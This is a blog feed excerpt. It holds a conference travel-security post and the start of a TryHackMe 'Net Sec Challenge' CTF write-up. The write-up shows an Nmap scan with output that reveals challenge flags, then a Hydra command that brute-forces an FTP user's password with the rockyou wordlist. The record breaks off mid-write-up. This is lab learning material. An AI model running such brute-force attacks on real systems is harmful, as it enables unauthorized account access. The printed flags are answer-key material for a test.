&lt;p&gt;Set up multi-factor authentication on &lt;em&gt;every&lt;/em&gt; account that supports it. Whenever possible, use a hardware key (like a &lt;a href=&quot;https://www.yubico.com/products/yubikey-5-overview/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;YubiKey&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;). As a bonus, you can use hardware security keys to further lock down access to your password manager: Do this using either &lt;a href=&quot;https://keepassxc.org/docs/KeePassXC_UserGuide.html#_database_settings&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;built-in support&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;, or by storing a long random string in one of your security key “slots” and then using this &lt;em&gt;in addition to&lt;/em&gt; a string that you’ve memorized to access your password vault (full-featured YubiKeys - not the lower-end “security keys” Yubico sells - support both options).&lt;/p&gt;
&lt;h2 id=&quot;packing&quot;&gt;Packing&lt;a role=&quot;anchor&quot; aria-hidden tabindex=&quot;-1&quot; data-no-popover href=&quot;#packing&quot; class=&quot;internal internal-link&quot;&gt;&lt;svg width=&quot;18&quot; height=&quot;18&quot; viewBox=&quot;0 0 24 24&quot; fill=&quot;none&quot; stroke=&quot;currentColor&quot; stroke-width=&quot;2&quot; stroke-linecap=&quot;round&quot; stroke-linejoin=&quot;round&quot;&gt;&lt;path d=&quot;M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;I’m a light packer, partly because I don’t like checking bags, and partly because I enjoy the challenge. This year I managed to fit all of my gear into a single &lt;a href=&quot;https://www.peakdesign.com/products/everyday-backpack&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Peak Design 20 L Everyday Backpack&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; (with the help of two small &lt;a href=&quot;https://www.peakdesign.com/products/packing-cube/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;packing cubes&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;). However, this is all a tight fit - there’s next to no room for conference swag on the return trip, and the laptop compartments are compressed more than I’m comfortable with. Moving forward, I intend to switch to a Peak Design 30 L Everyday Backpack, as I think that the extra 10 L should be more than enough for me.&lt;/p&gt;
&lt;p&gt;There’s enough (low profile) pockets in the Peak Design Everyday backpack that I don’t need a cord bag, and it’s a reasonable size to use as a day bag at the conference itself. This requires some unpacking/repacking at the hotel, but that’s a small price to pay to avoid having to carry an entire additional bag. Peak Design products are a bit pricey, but I’ve experimented with &lt;em&gt;a lot&lt;/em&gt; of different bags over the years and they’re hands-down the most durable, versatile bags I’ve ever owned.&lt;/p&gt;
&lt;p&gt;One thing that’s enables me to pack light is that I’ve moved away from wearing jeans. Instead, I’ve switched to &lt;a href=&quot;https://shop.bluffworks.com/products/ascender-5-pocket-pants-regular-fit-asphalt-black&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Bluffworks’ Ascender 5-Pocket Pants&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;, which are tough, light, wrinkle-resistant, &lt;em&gt;very&lt;/em&gt; compressible, and have the bonus of being much harder to pick pocket than most other mens’ pants (though again, a determined thief can still defeat them). I pair these with Icebreaker &lt;a href=&quot;https://www.icebreaker.com/en-us/mens-underwear&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;underwear&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; and &lt;a href=&quot;https://www.icebreaker.com/en-us/mens-socks&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;socks&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;, which are also exceptionally light and durable. Bluffworks also makes &lt;a href=&quot;https://shop.bluffworks.com/products/gramercy-blazer-classic-fit-blue-hour&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;travel blazers&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; and &lt;a href=&quot;https://shop.bluffworks.com/pages/performance-suits&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;other outfits for less casual situations&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;; these are also good for traveling light, but by necessity take up a bit more space. There’s a trade-off between looking nice and packing light that is just difficult to navigate.&lt;/p&gt;
&lt;p&gt;One disadvantage of this setup is that it’s difficult to bring multiple pairs of shoes. I opt to just wear a pair of black running shoes - they’re not dress shoes, but they’re comfortable and sufficiently understated that you can get away with using them in less casual situations in a pinch.&lt;/p&gt;
&lt;h2 id=&quot;at-the-con&quot;&gt;At the con&lt;a role=&quot;anchor&quot; aria-hidden tabindex=&quot;-1&quot; data-no-popover href=&quot;#at-the-con&quot; class=&quot;internal internal-link&quot;&gt;&lt;svg width=&quot;18&quot; height=&quot;18&quot; viewBox=&quot;0 0 24 24&quot; fill=&quot;none&quot; stroke=&quot;currentColor&quot; stroke-width=&quot;2&quot; stroke-linecap=&quot;round&quot; stroke-linejoin=&quot;round&quot;&gt;&lt;path d=&quot;M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;At the conference, or really when traveling in general, I try to avoid being conspicuous. I don’t wear conference swag/merch. I don’t put stickers on my devices. I take off my conference badge and put it in my backpack when it’s not required. I don’t flash (or carry) big wads of cash.&lt;/p&gt;
&lt;p&gt;In short, I try not to &lt;em&gt;look&lt;/em&gt; like a target. Ideally, there should be no way for someone who sees you outside of the conference to know that you are an attendee.&lt;/p&gt;
&lt;h3 id=&quot;a-note-on-masks&quot;&gt;A note on masks&lt;a role=&quot;anchor&quot; aria-hidden tabindex=&quot;-1&quot; data-no-popover href=&quot;#a-note-on-masks&quot; class=&quot;internal internal-link&quot;&gt;&lt;svg width=&quot;18&quot; height=&quot;18&quot; viewBox=&quot;0 0 24 24&quot; fill=&quot;none&quot; stroke=&quot;currentColor&quot; stroke-width=&quot;2&quot; stroke-linecap=&quot;round&quot; stroke-linejoin=&quot;round&quot;&gt;&lt;path d=&quot;M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;I don’t like wearing masks, but if I’m going to wear one I’m going to wear an &lt;em&gt;effective&lt;/em&gt; one. Since HOPE and DEF CON were both masked events, I brought along tight-fitting &lt;a href=&quot;https://bnx.com/products/n95-mask-black-made-in-usa-bifold-h95b/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;N95 masks&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; for use while attending the conference.&lt;/p&gt;
&lt;p&gt;The problem with a well-fitted N95 masks is that they’re kind of a pain to take off. This makes both eating and (more importantly) drinking a less attractive proposition. I wound up going back to my hotel to do both during the day, which created larger gaps in my schedule than I planned.&lt;/p&gt;
&lt;p&gt;Moving forward, I don’t think it makes sense to bring a water bottle to any events that have a mask requirement. I also need to remember that I can’t effectively pull off my normal back-to-back-to-back event schedule at conferences with mask requirements. This means doing &lt;em&gt;less&lt;/em&gt; at these events than I otherwise would, but &lt;em&gt;c’est la vie&lt;/em&gt; in the time of plague.&lt;/p&gt; ]]></description>
    <pubDate>Mon, 15 Aug 2022 00:00:00 GMT</pubDate>
  </item><item>
    <title>Net sec challenge</title>
    <link>https://remarks.delphi-strategy.com/ctfs/2022-04-03</link>
    <guid>https://remarks.delphi-strategy.com/ctfs/2022-04-03</guid>
    <description><![CDATA[ &lt;h1 id=&quot;net-sec-challenge&quot;&gt;Net sec challenge&lt;a role=&quot;anchor&quot; aria-hidden tabindex=&quot;-1&quot; data-no-popover href=&quot;#net-sec-challenge&quot; class=&quot;internal internal-link&quot;&gt;&lt;svg width=&quot;18&quot; height=&quot;18&quot; viewBox=&quot;0 0 24 24&quot; fill=&quot;none&quot; stroke=&quot;currentColor&quot; stroke-width=&quot;2&quot; stroke-linecap=&quot;round&quot; stroke-linejoin=&quot;round&quot;&gt;&lt;path d=&quot;M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/h1&gt;
&lt;blockquote class=&quot;callout note&quot; data-callout=&quot;note&quot;&gt;
&lt;div class=&quot;callout-title&quot;&gt;
                  &lt;div class=&quot;callout-icon&quot;&gt;&lt;/div&gt;
                  &lt;div class=&quot;callout-title-inner&quot;&gt;&lt;p&gt;Note&lt;/p&gt;&lt;/div&gt;
                  
                &lt;/div&gt;
&lt;div class=&quot;callout-content&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://tryhackme.com/room/netsecchallenge&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;“Net Sec Challenge” on TryHackMe&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/blockquote&gt;
&lt;p&gt;This CTF is just a series of questions. All should be solvable using &lt;a href=&quot;https://nmap.org/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Nmap&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;, telnet, and &lt;a href=&quot;https://github.com/vanhauser-thc/thc-hydra&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Hydra&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;… Though I’m going to substitute netcat for telnet. However, I’m sticking to the spirit of things, and will only use those three tools.&lt;/p&gt;
&lt;p&gt;The target machine is 10.10.152.115.&lt;/p&gt;
&lt;p&gt;We’ll start off with a full &lt;a href=&quot;https://nmap.org/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Nmap&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; scan:&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;sudo&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; nmap&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -v&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -oN&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; net-sec-challenge&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -Pn&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -A&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; --reason&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -T4&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;          -p-&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; 10.10.152.115&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;Results:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Nmap 7.92 scan initiated Sun Apr  3 20:48:04 2022 as: nmap -v -oN net-sec-challenge -Pn -A --reason -T4 -p- 10.10.152.115
Increasing send delay for 10.10.152.115 from 0 to 5 due to 909 out of 2271 dropped probes since last increase.
Increasing send delay for 10.10.152.115 from 5 to 10 due to 11 out of 15 dropped probes since last increase.
Nmap scan report for 10.10.152.115
Host is up, received user-set (0.19s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE SERVICE     REASON         VERSION
22/tcp    open  ssh         syn-ack ttl 61 (protocol 2.0)
| ssh-hostkey:
|   3072 da:5f:69:e2:11:1f:7c:66:80:89:61:54:e8:7b:16:f3 (RSA)
|   256 3f:8c:09:46:ab:1c:df:d7:35:83:cf:6d:6e:17:7e:1c (ECDSA)
|_  256 ed:a9:3a:aa:4c:6b:16:e6:0d:43:75:46:fb:33:b2:29 (ED25519)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-OpenSSH_8.2p1 THM{946219583339}
80/tcp    open  http        syn-ack ttl 61 lighttpd
|_http-server-header: lighttpd THM{web_server_25352}
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-title: Hello, world!
139/tcp   open  netbios-ssn syn-ack ttl 61 Samba smbd 4.6.2
445/tcp   open  netbios-ssn syn-ack ttl 61 Samba smbd 4.6.2
8080/tcp  open  http        syn-ack ttl 61 Node.js (Express middleware)
|_http-title: Site doesn&#039;t have a title (text/html; charset=utf-8).
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
10021/tcp open  ftp         syn-ack ttl 61 vsftpd 3.0.3
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.92%I=7%D=4/3%Time=624A60E5%P=x86_64-pc-linux-gnu%r(NULL,
SF:29,&quot;SSH-2\.0-OpenSSH_8\.2p1 THM{946219583339}
&quot;);
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=4/3%OT=22%CT=1%CU=32245%PV=Y%DS=4%DC=T%G=Y%TM=624A6111
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST11
OS:NW7%O6=M506ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(
OS:R=Y%DF=Y%T=40%W=F507%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Uptime guess: 12.801 days (since Tue Mar 22 01:54:39 2022)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Unix

Host script results:
|_clock-skew: -1s
| nbstat: NetBIOS name: NETSEC-CHALLENG, NetBIOS user: &amp;#x3C;unknown&gt;, NetBIOS MAC: &amp;#x3C;unknown&gt; (unknown)
| Names:
|   NETSEC-CHALLENG&amp;#x3C;00&gt;  Flags: &amp;#x3C;unique&gt;&amp;#x3C;active&gt;
|   NETSEC-CHALLENG&amp;#x3C;03&gt;  Flags: &amp;#x3C;unique&gt;&amp;#x3C;active&gt;
|   NETSEC-CHALLENG&amp;#x3C;20&gt;  Flags: &amp;#x3C;unique&gt;&amp;#x3C;active&gt;
|   WORKGROUP&amp;#x3C;00&gt;        Flags: &amp;#x3C;group&gt;&amp;#x3C;active&gt;
|_  WORKGROUP&amp;#x3C;1e&gt;        Flags: &amp;#x3C;group&gt;&amp;#x3C;active&gt;
| smb2-time:
|   date: 2022-04-04T03:07:53
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

TRACEROUTE (using port 1025/tcp)
HOP RTT       ADDRESS
1   47.27 ms  10.13.0.1
2   ... 3
4   222.58 ms 10.10.152.115

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr  3 21:08:01 2022 -- 1 IP address (1 host up) scanned in 1197.32 seconds
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This enables us to answer a set of questions immediately, but after this things get harder…&lt;/p&gt;
&lt;p&gt;We start off by attempting to brute force the password for eddie or quinn using &lt;a href=&quot;https://github.com/vanhauser-thc/thc-hydra&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Hydra&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;. To do this, we’re going to run two &lt;a href=&quot;https://github.com/vanhauser-thc/thc-hydra&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Hydra&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; tasks in parallel.&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#928374;--shiki-light-font-style:italic;--shiki-dark:#928374;--shiki-dark-font-style:italic&quot; data-token-type=&quot;comment&quot;&gt;# Hydra task to break eddie&#039;s password.&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#928374;--shiki-light-font-style:italic;--shiki-dark:#928374;--shiki-dark-font-style:italic&quot; data-token-type=&quot;comment&quot;&gt;#&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;hydra&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -v&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -f&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -t&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; 10&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -s&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; 10021&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -l&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; eddie&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;      -P&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; ~/.local/share/red-team/wordlists/rockyou.txt&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;         10.10.152.115&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; ftp&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt; &lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#928374;--shiki-light-font-style:italic;--shiki-dark:#928374;--shiki-dark-font-style:italic&quot; data-token-type=&quot;comment&quot;&gt;# Hydra task to break quinn&#039;s password.&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#928374;--shiki-light-font-style:italic;--shiki-dark:#928374;--shiki-dark-font-style:italic&quot; data-token-type=&quot;comment&quot;&gt;#&lt;/span&gt;&lt;/span&gt;
